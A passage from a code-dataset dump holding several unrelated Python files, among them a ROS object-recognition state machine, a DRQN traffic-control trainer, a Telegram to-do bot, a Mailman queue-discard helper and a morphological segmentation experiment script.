import detect_object\n\n# Some color codes for prints, from http://stackoverflow.com/questions/287871/print-in-terminal-with-colors-using-python\nENDC = '\\033[0m'\nFAIL = '\\033[91m'\nOKGREEN = '\\033[92m'\n\nclass proces_object(smach.State):\n    def __init__(self):\n        smach.State.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'],\n                             input_keys=['standard_error','objects','object_name', 'objectd'],\n                             output_keys=['standard_error','objectd'])\n\n    def execute(self, userdata):\n        \n        rospy.logwarn(userdata.objects)\n        # first check whether any objects were detected at all\n        if userdata.objects.objects:\n            # check which mode we are in: looking for a specific name or not\n            \n            if userdata.object_name!="":\n                userdata.objectd=[objectd for objectd in userdata.objects.objects if objectd.object_name.data==userdata.object_name]\n                if userdata.objectd:\n                    userdata.objectd=userdata.objectd.pop()\n                    userdata.standard_error="Recognize_object_Name OK"+userdata.standard_error\n                    return 'succeeded'\n                else:\n                    userdata.standard_error="Recognize:= No object with that name"+userdata.standard_error\n                    return 'aborted'\n            # if we are not looking for a specific name, sort the detections\n            else:\n                # take the detection with the best confidence\n                userdata.objects.objects.sort(cmp=None, key=attrgetter('confidence'), reverse=True)\n                userdata.objectd=userdata.objects.objects[0]\n                userdata.standard_error="Recognize_object_Normal OK"+userdata.standard_error\n                return 'succeeded'\n        else:\n            userdata.standard_error="no objects available"+userdata.standard_error\n            userdata.objectd=None\n            return 'aborted'\n\n\nclass recognize_object(smach.StateMachine): \n    """\n    Executes a SM that checks whether it can recognize an object.\n    \n    It has 2 options:\n    if you fill in the name, it will report whether\n    it finds this object, and return the object message for it.\n    If you don't fill it in, it will return the object with the highest confidence.\n    \n    \n    Required parameters : \n    No parameters.\n\n    Optional parameters:\n    object_name, the name of the object that you are looking for; it will return\n    aborted if it can't be found \n\n    input keys:\n    object_name, the optional name of the object we are looking for, it can be the name or ""\n    output keys:\n    standard_error: informs what the problem is\n    objectd, is a message that has ObjectDetection, \n    it will be None if no objects can be found\n    No io_keys.\n\n    Nothing must be taken into account to use this SM.\n    """\n    def __init__(self,minConfidence=90):\n        smach.StateMachine.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'],\n                                    
input_keys=['object_name'], \n output_keys=['standard_error','objectd'])\n \n with self:\n\n smach.StateMachine.add(\n 'detect_object',\n detect_object(minConfidence),\n transitions={'succeeded': 'proces_object', 'aborted': 'aborted', \n 'preempted': 'preempted'})\n \n smach.StateMachine.add(\n 'proces_object',\n proces_object(),\n transitions={'succeeded': 'succeeded', 'aborted': 'aborted', \n 'preempted': 'preempted'})\n \n\n\n\n\n \n\n\n","sub_path":"basic_states/object_grasping_states/src/object_grasping_states/recognize_object.py","file_name":"recognize_object.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"536627986","text":"import numpy as np\nfrom tqdm import tqdm\nimport tensorflow as tf\nimport imageio\nimageio.plugins.ffmpeg.download()\nfrom gym_traffic.utils.helper import *\nfrom gym_traffic.agents.drqn import DRQN\nfrom IPython import embed\nfrom skimage.transform import resize\nclass experience_buffer():\n def __init__(self, buffer_size = 600):\n self.buffer = []\n self.buffer_size = buffer_size\n\n def add(self,experience):\n if len(self.buffer) + 1 >= self.buffer_size:\n self.buffer[0:(1+len(self.buffer))-self.buffer_size] = []\n self.buffer.append(experience)\n print ('buffer_size: ', len(self.buffer))\n\n def sample(self,batch_size,trace_length):\n # print ('np random sample: ', 'self.buffer: ', len(self.buffer), 'batch_size: ', batch_size)\n sampled_episodes = random.sample(self.buffer,batch_size)\n sampledTraces = []\n for episode in sampled_episodes:\n point = np.random.randint(0,len(episode)+1-trace_length)\n sampledTraces.append(episode[point:point+trace_length])\n sampledTraces = np.array(sampledTraces)\n # print ('!!!!!!!!!', sampledTraces.shape)\n return np.reshape(sampledTraces,[batch_size*trace_length,5])\n\n\nclass DRQNRunner(object):\n\n def __init__(self, max_steps_per_episode = 1000):\n # self.max_steps_per_episode=max_steps_per_episode\n #Setting the training parameters\n self.batch_size = 16 #How many experience traces to use for each training step.\n self.trace_length = 8 #How long each experience trace will be when training\n self.update_freq = 5 #How often to perform a training step.\n self.y = .99 #Discount factor on the target Q-values\n self.startE = 1 #Starting chance of random action\n self.endE = 0.1 #Final chance of random action\n self.anneling_steps = 10000 #How many steps of training to reduce startE to endE.\n self.num_episodes = 10000 #How many episodes of game environment to train network with.\n self.pre_train_steps = 10000 #How many steps of random actions before training begins.\n self.load_model = False #Whether to load a saved model.\n self.path = \"./drqn\" #The path to save our model to.\n self.h_size = 512 #The size of the final convolutional layer before splitting it into Advantage and Value streams.\n self.max_epLength = max_steps_per_episode #The max allowed length of our episode.\n self.time_per_step = 1 #Length of each step used in gif creation\n self.summaryLength = 100 #Number of epidoes to periodically save for analysis\n self.tau = 0.001\n\n\n def run_training(self, env):\n tf.reset_default_graph()\n\n #We define the cells for the primary and target q-networks\n cell = tf.contrib.rnn.BasicLSTMCell(num_units = self.h_size,state_is_tuple = True)\n cellT = tf.contrib.rnn.BasicLSTMCell(num_units = self.h_size,state_is_tuple = True)\n mainQN = DRQN(self.h_size, self.batch_size, cell, 'main')\n targetQN = DRQN(self.h_size, 
self.batch_size, cellT, 'target')\n\n init = tf.global_variables_initializer()\n\n saver = tf.train.Saver(max_to_keep=10)\n\n trainables = tf.trainable_variables()\n\n targetOps = updateTargetGraph(trainables, self.tau)\n\n myBuffer = experience_buffer()\n\n #Set the rate of random action decrease.\n e = self.startE\n stepDrop = (self.startE - self.endE)/self.anneling_steps\n\n #create lists to contain total rewards and steps per episode\n jList = []\n rList = []\n total_steps = 0\n\n #Make a path for our model to be saved in.\n if not os.path.exists(self.path):\n os.makedirs(self.path)\n\n ##Write the first line of the master log-file for the Control Center\n with open('../Center/log.csv', 'w') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n wr.writerow(['Episode','Length','Reward','IMG','LOG','SAL'])\n\n\n with tf.Session() as sess:\n if (self.load_model == True):\n print ('Loading Model...')\n ckpt = tf.train.get_checkpoint_state(self.path)\n saver.restore(sess,ckpt.model_checkpoint_path)\n sess.run(init)\n\n updateTarget(targetOps,sess)\n for i in range(self.num_episodes):\n episodeBuffer = [[]] * 4\n print ('Episode: ', i)\n sP = env.reset()\n s = [None] * 4\n for v in range(4):\n s[v] = resize(sP[v], (84, 84))\n #s = sP\n d = [False] * 4\n rAll = 0\n j = 0\n state = [[np.zeros([1, self.h_size]),np.zeros([1, self.h_size])]] * 4\n state1 = [None] * 4\n a = [None]*4\n while j < self.max_epLength:\n j+=1\n for v in range(4):\n\t if np.random.rand(1) < e or total_steps < self.pre_train_steps:\n\t state1[v] = sess.run(mainQN.rnn_state,\n\t feed_dict={mainQN.imageIn:[s[v]/255.0],mainQN.trainLength:1,mainQN.state_in:state[v],mainQN.batch_size:1})\n\t \n\t a[v] = np.random.randint(0,3)\n\t assert(a[v]<3)\n\t else:\n\t a[v], state1[v] = sess.run([mainQN.predict,mainQN.rnn_state],\n\t feed_dict={mainQN.imageIn:[s[v]/255.0],mainQN.trainLength:1,mainQN.state_in:state[v],mainQN.batch_size:1})\n\t a[v] = a[v][0]\n\t assert(a[v]<3)\n #print(a)\n d_old = d.copy()\n s1P, r, d, info = env.step(a)\n #print(type(d)) \n if isinstance(d, bool):\n d = [True] * 4\n #print(d)\n s1 = [None] * 4\n for v in range(4):\n s1[v] = resize(s1P[v], (84, 84))\n #s1 = s1P\n total_steps += 1\n for v in range(4):\n if not d_old[v]:\n s_ = np.array(s[v], dtype = np.int16)\n a_ = np.array(a[v], dtype = np.int16)\n r_ = np.array(r[v], dtype = np.int16)\n s1_ = np.array(s1[v], dtype = np.int16)\n d_ = np.array(d[v], dtype = np.int16)\n\n episodeBuffer[v].append(np.reshape(np.array([s_,a_,r_,s1_,d_]),[1,5]))\n # print(episodeBuffer[-1].shape)\n # except:\n # print(s)\n # print(a)\n # print(r)\n # print(s1)\n # print(d)\n # print(d_old)\n # break\n # print(episodeBuffer[-1].shape)\n if total_steps > self.pre_train_steps:\n if e > self.endE:\n e -= stepDrop\n\n if total_steps % (self.update_freq) == 0:\n updateTarget(targetOps,sess)\n state_train = (np.zeros([self.batch_size, self.h_size]),np.zeros([self.batch_size, self.h_size]))\n\n trainBatch = myBuffer.sample(self.batch_size, self.trace_length)\n trainBatch_st_0 = np.concatenate([arr[np.newaxis] for arr in trainBatch[:,0]]).astype(float)\n trainBatch_st_1 = np.concatenate([arr[np.newaxis] for arr in trainBatch[:,3]]).astype(float)\n\n Q1 = sess.run(mainQN.predict, feed_dict={mainQN.imageIn:trainBatch_st_1/255.0,\n mainQN.trainLength: self.trace_length, mainQN.state_in: state_train, mainQN.batch_size: self.batch_size})\n\n Q2 = sess.run(targetQN.Qout, feed_dict={targetQN.imageIn:trainBatch_st_1/255.0,\n targetQN.trainLength: self.trace_length, 
targetQN.state_in:state_train, targetQN.batch_size: self.batch_size})\n\n end_multiplier = -(trainBatch[:,4] - 1)\n doubleQ = Q2[range(self.batch_size * self.trace_length), Q1]\n targetQ = trainBatch[:,2] + (self.y*doubleQ * end_multiplier)\n \n sess.run(mainQN.updateModel, feed_dict={mainQN.imageIn: trainBatch_st_0/255.0,\n mainQN.targetQ: targetQ, mainQN.actions: trainBatch[:,1], mainQN.trainLength: self.trace_length,\n mainQN.state_in: state_train, mainQN.batch_size: self.batch_size})\n\n \t \n #print(np.array([r[i] * (not d_old[i]) for i in range(4)])) \n rAll += np.array([r[i] * (not d_old[i]) for i in range(4)])\n s = s1.copy()\n sP = s1P.copy()\n state = state1.copy()\n if all(d):\n break\n\n print ('steps taken: ', j)\n print ('total reward: ', rAll) \n print('Average reward: ' + str(np.mean(rAll))) \n \n for v in range(4):\n if (len(episodeBuffer[v])>= self.trace_length):\n bufferArray = np.array(episodeBuffer[v])\n episodeBuffer[v] = list(zip(bufferArray))\n myBuffer.add(episodeBuffer[v])\n jList.append(j)\n rList.append(rAll[0])\n\n #Periodically save the model.\n if i % 100 == 0 and i != 0:\n saver.save(sess,self.path+'/model-'+str(i)+'.cptk')\n print (\"Saved Model\")\n if len(rList) % self.summaryLength == 0 and len(rList) != 0:\n print (total_steps,np.mean(rList[-self.summaryLength:]), e)\n saveToCenter(i,rList,jList,np.reshape(np.array(episodeBuffer[0]), [len(episodeBuffer[0]),5]), self.summaryLength,\n self.h_size, sess, mainQN, self.time_per_step)\n saver.save(sess,self.path+'/model-'+str(i)+'.cptk')\n","sub_path":"gym-traffic/gym_traffic/runners/drqn_runner.py","file_name":"drqn_runner.py","file_ext":"py","file_size_in_byte":9008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"276639467","text":"\nimport path\n\nclass Locale(object):\n def __init__(self, name, pathStr):\n self.path = path.Path(pathStr)\n self.name = name\n\nLOCALES = LOCAL, NETWORK = \\\n (\n Locale('local', '~/presets/'),\n Locale('network', '~/global/presets/'),\n )\n\nDEFAULT_EXT = 'preset'\n\nclass Preset(object):\n\n @classmethod\n def FromFilepath(cls, filepath):\n filepath = path.Path(filepath)\n\n for locale in LOCALES:\n if filepath.isUnder(locale.path):\n presetSub = filepath.up() - locale.path\n\n return cls(filepath.name(), presetSub, locale, filepath.getExtension())\n\n def __init__(self, name, location, locale=LOCAL, extension=DEFAULT_EXT):\n self.name = name\n self.location = location\n self.locale = locale\n self.extension = extension\n\n @property\n def localeName(self):\n return self.locale.name\n\n def path(self):\n return self.locale.path / self.location / ('%s.%s' % (self.name, self.extension))\n\n def open(self, mode='r'):\n filepath = self.path()\n dirpath = filepath.up()\n if dirpath.exists() is False:\n dirpath.create()\n\n return open(filepath, mode)\n\nclass Manager(object):\n def __init__(self, location, extension=DEFAULT_EXT):\n self.location = location\n self.extension = extension\n\n def iterPresets(self, localeOrdering=LOCALES):\n presetsYielded = set()\n for locale in localeOrdering:\n baseLocation = locale.path / self.location\n if not baseLocation.exists():\n continue\n\n for f in baseLocation.files():\n if f.hasExtension(self.extension):\n if f.name() in presetsYielded:\n continue\n\n presetsYielded.add(f.name())\n yield Preset.FromFilepath(f)\n\n def getPreset(self, name, localeOrdering=LOCALES):\n for locale in localeOrdering:\n preset = Preset(name, self.location, locale, self.extension)\n if 
preset.path().exists():\n return preset\n\n # if no existing preset is found, return an instance in the default location (the first locale in the list)\n return Preset(name, self.location, localeOrdering[0], self.extension)\n\n#end\n","sub_path":"CONFIG_v2.5/mayaConfig/modules_local/UTSMOD/2016/mac/quarantined_scripts/zoo/presets.py","file_name":"presets.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"63245033","text":"#import packages from matplotlib\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\n\n# read image\nfilename='sample.jpg'\nimage=mpimg.imread(filename)\n\ndef color_thresh(img, rgbthresh=(0,0,0)):\n #create empty array\n color_select = np.zeros_like(img[:,:,0])\n # apply threshold for RGB and assign 1\n above_threshold = (img[:,:,0]>rgbthresh[0]) \\\n & (img[:,:,1]>rgbthresh[1]) \\\n & (img[:,:,2]>rgbthresh[2])\n color_select[above_threshold] = 1\n return color_select\n\ndef perspect_transform(img, src, dst):\n\t#get transformation matrix M\n\tM = cv2.getPerspectiveTransform(src,dst)\n\t#warp image\n\twarped = cv2.warpPerspective(img, M, (img.shape[1],img.shape[0]))\n\treturn warped\n\n# convert to rover coordinates function\ndef rover_coords(binary_img): \n\t# identify nonzero pixels\n\typos, xpos = binary_img.nonzero()\n\t# calculate pixel positions with ref to the rover position at the center, btm of img\n\tx_pixel = -(ypos - binary_img.shape[0]).astype(np.float)\n\ty_pixel = -(xpos - binary_img.shape[1]/2 ).astype(np.float)\n\treturn x_pixel, y_pixel\n\n# set destination size, source points, destination points \ndst_size = 5.0 \nbtm_offset = 6 # so that image will start 6 rows front of rover\n\nsource = np.float32([[14,140],[301,140],[200,96],[118,96]])\ndestination = np.float32([[image.shape[1]/2 - dst_size, image.shape[0] - btm_offset],\n\t\t\t\t\t\t [image.shape[1]/2 + dst_size, image.shape[0] - btm_offset],\n\t\t\t\t\t\t [image.shape[1]/2 + dst_size, image.shape[0] - 2*dst_size - btm_offset],\n\t\t\t\t\t\t [image.shape[1]/2 - dst_size, image.shape[0] - 2*dst_size - btm_offset]]) \n\n\n# Perform perspective transform and color threshold\nwarped = perspect_transform(image, source, destination)\ncolor_sel = color_thresh(warped, rgbthresh=(160,160,160))\nxpix, ypix = rover_coords(color_sel)\n\n# plot map in rover coordinates\nfig = plt.figure(figsize=(5, 7.5))\nplt.plot(xpix, ypix, '.')\nplt.ylim(-160, 160)\nplt.xlim(0, 160)\nplt.title('Rover-Centric Map', fontsize=20)\nplt.show()","sub_path":"exercises/rover_coords.py","file_name":"rover_coords.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"473146636","text":"import numpy as np \nimport sys\nimport os\nfrom numpy import linalg as LA\n\nfiles = os.listdir('advs')\nmetric = sys.argv[-1]\nsign = sys.argv[-2]\nattack = sys.argv[-3]\nlst = []\nfor f in files:\n if f.find('mnist') == -1:\n continue\n if not f.endswith('show.npy'):\n continue\n if f.find(attack) == -1:\n continue\n if f.find(sign) == -1:# and f.find('high') == -1:# and f.find('mix') == -1:\n continue\n if f.find(metric) == -1:\n continue\n lst.append(f)\nlist.sort(lst)\n#lst = lst[-4:]\nprint(lst)\nidxs = np.load('data/final_random_1000_correct_idxs.npy')+60000\nimgs = np.load('data/mnist_data.npy')[idxs].astype(np.float32) / 255.\nlabs = np.load('data/mnist_labels.npy')[idxs]\nprint(imgs.shape, 
labs.shape)\n#print(imgs[999]==0)\ncnt = 0\nnum = 1000\nfor f in lst:\n cnt = 0\n print(f)\n f = os.path.join('advs', f)\n b = np.load(f).astype(np.float32) / 255.\n a = np.load(f[:-8]+'label.npy')\n if len(a) == num:\n np.save(f[:-8]+'idxs.npy', np.arange(cnt, cnt+num))\n cnt += num\n continue\n\n pos, tmp = [], []\n mindis, i = np.inf, 0\n for j in range(cnt, cnt+num):\n v = labs[j]\n if i >= len(a):\n break\n# print(i, v, a[i])\n if v == a[i]:\n if len(tmp) > 0:\n pos.append(np.random.permutation(tmp)[0])\n tmp = []\n# print(v, j)\n# mindis = LA.norm((b[i]-imgs[j]).reshape(-1), np.inf) if metric == 'linf' else LA.norm((b[i]-imgs[j]).reshape(-1), 2)\n mindis = np.max(np.absolute(b[i]-imgs[j])) if metric == 'linf' else np.sum((b[i]-imgs[j])**2)\n tmp = [j]\n# print(v, a[i-1], pos, mindis, tmp)\n i += 1\n elif i > 0 and v == a[i-1]:\n dis = np.max(np.absolute(b[i]-imgs[j])) if metric == 'linf' else np.sum((b[i]-imgs[j])**2)\n if dis < mindis:\n mindis = dis\n tmp = [j]\n elif dis == mindis:\n tmp.append(j)\n# print(i, v, a[i-1], dis, mindis)\n \n if len(tmp) > 0:\n pos.append(np.random.permutation(tmp)[0])\n print(len(a), len(pos))\n assert len(a) == len(pos) #print(len(a), len(pos))\n np.save(f[:-8]+'idxs.npy', pos)\n cnt += num\n \n","sub_path":"label_to_idxs.py","file_name":"label_to_idxs.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"575792923","text":"import sqlalchemy\nimport logging\n\nfrom db import User, Task, Session\nfrom handlers_index import *\nfrom markup import confirm_markup, markup, delete_markup\n\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n\ndef start(update, context):\n username = update.message[\"chat\"][\"username\"]\n user = User(username=username)\n\n session = Session()\n\n try:\n session.add(user)\n session.commit()\n except sqlalchemy.exc.IntegrityError:\n print(\"User has already been created\")\n\n update.message.reply_text(\n \"Hi! 
I'm the best task manager in Telegram\\n\"\n        \"Why don't you add your tasks here?\",\n        reply_markup=markup,\n        parse_mode=\"HTML\"\n    )\n\n    return CHOOSING\n\n\ndef add(update, context):\n\n    update.message.reply_text(\"Enter your task\", reply_markup=delete_markup)\n    return ADD\n\n\ndef add_task(update, context):\n    text = update.message.text\n    context.user_data[\"task\"] = text\n\n    context.bot.send_message(text=\"Save?\\n\"\n                                  \"{}\".format(text),\n                             chat_id=update.effective_chat.id,\n                             reply_markup=confirm_markup)\n    return ADD_CONFIRM\n\n\ndef add_confirm(update, context):\n    answer = update.message.text\n\n    if answer == \"Yes\":\n        username = update.message[\"chat\"][\"username\"]\n        text = context.user_data[\"task\"]\n\n        session = Session()\n        user = session.query(User).filter(User.username == username).one()\n\n        user.tasks.append(Task(text=text))\n        session.commit()\n\n        update.message.reply_text(\"A new task has been successfully created!\", reply_markup=markup)\n    else:\n        del context.user_data[\"task\"]\n\n    return CHOOSING\n\n\ndef delete(update, context):\n    update.message.reply_text(\n        \"Enter the id of the task to delete\"\n    )\n\n    return DELETE\n\n\ndef delete_id(update, context):\n    text = update.message.text\n    username = update.message.chat.username\n\n    context.user_data[\"id\"] = text\n\n    session = Session()\n    u = session.query(User).filter(User.username == username).one()\n\n    ts = u.tasks\n\n    update.message.reply_text(\n        \"Are you sure you want to delete this task:\\n\"\n        \"{}\".format(ts[int(text)-1]),\n        parse_mode=\"HTML\",\n        reply_markup=confirm_markup\n    )\n    return DELETE_CONFIRM\n\n\ndef delete_confirm(update, context):\n    text = update.message.text\n    username = update.message.chat.username\n\n    if text == \"Yes\":\n        session = Session()\n        u = session.query(User).filter(User.username == username).one()\n\n        ts = u.tasks\n        task_index = int(context.user_data[\"id\"]) - 1  # avoid shadowing the builtin id()\n\n        task = ts[task_index]\n\n        session.delete(task)\n        session.commit()\n\n        del context.user_data[\"id\"]\n\n        update.message.reply_text(\"You have successfully deleted the task!\", reply_markup=markup)\n        return CHOOSING\n    elif text == \"No\":\n        update.message.reply_text(\"It's ok\", reply_markup=markup)\n\n        return CHOOSING\n    else:\n        update.message.reply_text(\"Type 'Yes' or 'No'\")\n\n        return DELETE_CONFIRM\n\n\ndef show(update, context):\n    username = update.message[\"chat\"][\"username\"]\n    print(username)\n    update.message.reply_text(\n        \"Your tasks:\"\n        \"{}\".format(tasks(username))\n    )\n\n    return CHOOSING\n\n\ndef tasks(username):\n    session = Session()\n    r = list()\n\n    u = session.query(User).filter(User.username == username).one()\n\n    for i, t in enumerate(u.tasks):\n        r.append(\"{0}. 
{1}\".format(i+1, t.text))\n\n return \"\\n\".join(r).join(['\\n', '\\n'])\n\n\ndef finish(update, context):\n update.message.reply_text(\"Bye-bye\")\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"367448238","text":"\"\"\"Constants for the Dynalite component.\"\"\"\nimport logging\n\nLOGGER = logging.getLogger(__package__)\nDOMAIN = \"dynalite\"\n\nENTITY_PLATFORMS = [\"light\"]\n\nCONF_ACTIVE = \"active\"\nCONF_ALL = \"ALL\"\nCONF_AREA = \"area\"\nCONF_AUTO_DISCOVER = \"autodiscover\"\nCONF_BRIDGES = \"bridges\"\nCONF_CHANNEL = \"channel\"\nCONF_DEFAULT = \"default\"\nCONF_FADE = \"fade\"\nCONF_HOST = \"host\"\nCONF_NAME = \"name\"\nCONF_POLLTIMER = \"polltimer\"\nCONF_PORT = \"port\"\n\n\nDEFAULT_NAME = \"dynalite\"\nDEFAULT_PORT = 12345\n","sub_path":"homeassistant/components/dynalite/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"9596184","text":"\"\"\"\nExtension functions to discard all moderated messages in a SourceForge-based\nmailman queue.\n\n(Currently there is no way to do this without manually selecting 'discard'\nfor each and every message.)\n\"\"\"\n\nimport re\n\nfrom twill import browser, log, utils\n\n__all__ = ['discard_all_messages', 'exit_if_empty']\n\n\ndef exit_if_empty():\n \"\"\">> exit_if_empty\n\n Exit the script currently running, if there are no deferred messages\n on the current page.\n \"\"\"\n form = browser.form()\n if not form:\n log.error(\"No messages; exiting.\")\n raise SystemExit\n\n\ndef discard_all_messages():\n \"\"\">> discard_all_messages\n\n Set all buttons to \"discard\".\n \"\"\"\n _formvalue_by_regex_setall('1', '^\\\\d+$', '3')\n\n\ndef _formvalue_by_regex_setall(form_name, field_name, value):\n form = browser.form(form_name)\n if not form:\n log.error(\"no such form '%s'\", form_name)\n return\n\n regex = re.compile(field_name)\n\n matches = [ctl for ctl in form.controls if regex.search(str(ctl.name))]\n\n if matches:\n log.info('-- matches %d', len(matches))\n\n n = 0\n for control in matches:\n browser.clicked(form, control)\n if not control.readonly:\n utils.set_form_control_value(control, value)\n n += 1\n\n log.info('set %d values total', n)\n","sub_path":"twill/extensions/mailman_sf.py","file_name":"mailman_sf.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"267797980","text":"from docx import Document\nfrom docx.shared import Inches\nfrom slugify import slugify\nimport os\n\nfit_control_widget = cs.current_fit_widget\nfs = fit_control_widget.fit\nfww = cs.mdiarea.currentSubWindow()\n\ndocument = Document()\ndocument.add_heading(cs.current_fit.name, 0)\n\npk = cs.current_fit.model.parameters_all_dict.keys()\npk.sort()\n\ntarget_path = mfm.working_path\n\ndocument.add_heading('Fit-Results', level=1)\nfor i, f in enumerate(fs):\n\n fit_control_widget.selected_fit = i\n filename = slugify(unicode(os.path.basename(f.data.name)[0]))\n document.add_paragraph(\n filename, style='ListNumber'\n )\n\n target_dir = os.path.join(target_path, str(i), filename)\n try:\n os.makedirs(target_dir)\n except WindowsError:\n 
pass\n\n px = QtGui.QPixmap.grabWidget(fww)\n fit_png = os.path.join(target_dir, 'screenshot_fit.png')\n px.save(fit_png)\n\n px = QtGui.QPixmap.grabWidget(cs.current_fit.model)\n model_png = os.path.join(target_dir, 'screenshot_model.png')\n px.save(model_png)\n document.add_picture(model_png, width=Inches(2.5))\n document.add_picture(fit_png, width=Inches(2.5))\n try:\n tr = cs.current_fit.name.replace(':','_')\n cs.current_fit.save(target_dir, tr)\n except IOError:\n cs.current_fit.save(target_dir, 'fit')\n\ndocument.add_heading('Summary', level=1)\np = document.add_paragraph('Parameters which are fitted are given in ')\np.add_run('bold').bold = True\np.add_run(', linked parameters in ')\np.add_run('italic.').italic = True\np.add_run(' fixed parameters are plain text. ')\n\ntable = document.add_table(rows=1, cols=len(fs)+1)\nhdr_cells = table.rows[0].cells\nhdr_cells[0].text = \"Fit-Nbr\"\nfor i, f in enumerate(fs):\n hdr_cells[i+1].text = str(i + 1)\n\nfor k in pk:\n row_cells = table.add_row().cells\n row_cells[0].text = str(k)\n for i, f in enumerate(fs):\n paragraph = row_cells[i + 1].paragraphs[0]\n run = paragraph.add_run('{:.3f}'.format(f.model.parameters_all_dict[k].value))\n if f.model.parameters_all_dict[k].fixed:\n continue\n else:\n if f.model.parameters_all_dict[k].link is not None:\n run.italic = True\n else:\n run.bold = True\n\nrow_cells = table.add_row().cells\nrow_cells[0].text = str(\"Chi2r\")\nfor i, f in enumerate(fs):\n paragraph = row_cells[i + 1].paragraphs[0]\n run = paragraph.add_run('{:.4f}'.format(f.chi2r))\ntry:\n tr = slugify(unicode(fs.name))\n document.save(os.path.join(target_path, tr+'.docx'))\nexcept IOError:\n document.save(os.path.join(target_path, 'fit.docx'))\n cs.current_fit.save(target_dir, 'fit')\n","sub_path":"chisurf/macro/save_fit.py","file_name":"save_fit.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"38888123","text":"'''\r\nCreated on Jun 11, 2018\r\n\r\n@author: xh\r\n'''\r\n\r\n\r\nfrom param import Parameter\r\nfrom evaluation import evaluate_seg\r\nfrom morphanalyzer import MorphAnalyzer\r\n\r\n\r\ndef read_word_freq_list(infile):\r\n \"\"\"Read a file where each line contains a word and its frequency count, tab-separated.\r\n\r\n Returns a list of tuples of the form (word, freq).\r\n \"\"\"\r\n fin = open(infile, 'r', -1, 'utf-8')\r\n wordlist = []\r\n for line in fin:\r\n splitline = line.strip().split()\r\n if not line:\r\n continue\r\n word = splitline[0]\r\n freq = int(splitline[1])\r\n wordlist.append((word, freq))\r\n fin.close()\r\n return wordlist\r\n\r\n\r\ndef read_test_gold(infile):\r\n \"\"\"Read the gold-standard morphological segmentation from a file.\r\n\r\n Each line contains a word, followed by a colon, and then a space-separated list of allowable morphological segments\r\n where the segments are separated by dashes.\r\n\r\n Returns a list of words, and a list of lists of segmentations. 
Should be of the same length.\r\n \"\"\"\r\n fin = open(infile, 'r', -1, 'utf-8')\r\n wordlist = []\r\n goldseglist = []\r\n for line in fin:\r\n line = line.strip()\r\n token_segs = line.split(':')\r\n # get the full list of segmentations\r\n seg_candidates = token_segs[1].strip().split(' ')\r\n original_word = token_segs[0].strip()\r\n word = ''\r\n segs_morphs = []\r\n for seg in seg_candidates:\r\n # break each segmentation into segments\r\n seg_morphs = seg.strip().split('-')\r\n mainword = ''.join(seg_morphs)\r\n if word != '' and mainword != word: # ensure the segmentations are spelled the same as the word itself\r\n print('Inconsistent segmentations: %s - %s' % (word, mainword))\r\n word = mainword\r\n # save the segmentation as a tuple of segments\r\n segs_morphs.append(tuple(seg_morphs))\r\n wordlist.append(original_word)\r\n goldseglist.append(segs_morphs)\r\n fin.close()\r\n return wordlist, goldseglist\r\n\r\n\r\ndef add_test_to_train(train_word_freq_list, test_list):\r\n \"\"\"Add words from the test data to the frequency list, assuming a frequency of 10.\"\"\"\r\n # turn it into a dictionary\r\n word_dict = dict(train_word_freq_list)\r\n for word in test_list:\r\n if word in word_dict:\r\n word_dict[word] += 10\r\n else:\r\n word_dict[word] = 10\r\n # change back to a list of tuples and return\r\n return sorted(word_dict.items(), key=lambda x: -x[1])\r\n\r\n\r\ndef run_experiment(infile_train, infile_test_gold, params):\r\n \"\"\"Run an experiment by reading data from a training file and testing on the gold standard data.\"\"\"\r\n print('| Reading data...')\r\n # read the frequency list data\r\n train_word_freq_list = read_word_freq_list(infile_train)\r\n # read the gold standard data into a test list of words and the answers\r\n test_list, test_gold = read_test_gold(infile_test_gold)\r\n # print the length of the training and test data\r\n print('--Training data: %s' % (len(train_word_freq_list)))\r\n print('--Testing data: %s' % (len(test_list)))\r\n\r\n # add the test data to the training data. 
This is to ensure all words in the test data are listed with freq > 0.\r\n train_word_freq_list = add_test_to_train(train_word_freq_list, test_list)\r\n\r\n print('| Training...')\r\n # create the analyzer using the specified parameters\r\n morph_analyzer = MorphAnalyzer(params)\r\n # train\r\n morph_analyzer.train(train_word_freq_list)\r\n\r\n print('| Segmenting test tokens...')\r\n # segment the test data\r\n test_segs_components = morph_analyzer.segment_token_list(test_list)\r\n # get the segmentation listed for each word\r\n test_segs = [x[0] for x in test_segs_components]\r\n print('| Evaluation...')\r\n # get precision, recall, and F1 scores\r\n evaluate_seg(test_gold, test_segs)\r\n\r\n\r\ndef run_english():\r\n \"\"\"Runs an experiment on English data against gold standard results.\"\"\"\r\n params = Parameter()\r\n params.UseTransRules = True\r\n params.DoPruning = True\r\n params.DoCompound = True\r\n params.ExcludeUnreliable = True\r\n params.BestNCandSuffix = 70\r\n infile_train = r'data/wordlist.2010.eng.utf8.txt'\r\n 